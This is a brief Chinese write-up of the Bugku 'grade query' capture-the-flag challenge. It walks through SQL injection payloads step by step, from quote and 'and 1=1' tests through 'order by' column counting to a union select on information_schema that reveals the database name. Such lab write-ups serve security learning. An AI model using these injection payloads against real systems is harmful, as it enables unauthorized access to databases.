一个小小的盲注
bugku 成绩查询
注入过程
1.打开页面发现一个成绩查询的页面,很有sql注入的味道
2.输入1、2、3都有回显
3.输入 1' 发现没有回显
4.输入1'#有回显, 1'and 1=1 无回显 ,1'and 1=1# 有回显
5.输入1' order by 1,2,3,4#有回显,1' order by 1,2,3,4,5#无回显(确定是四列)
5.1输入-1' union select 1,2,3,4#确定没过滤,union也能执行
6.-1'union select 1,2,3,group_concat(schema_name)from information_schema.schemata # 查询数据库名skctf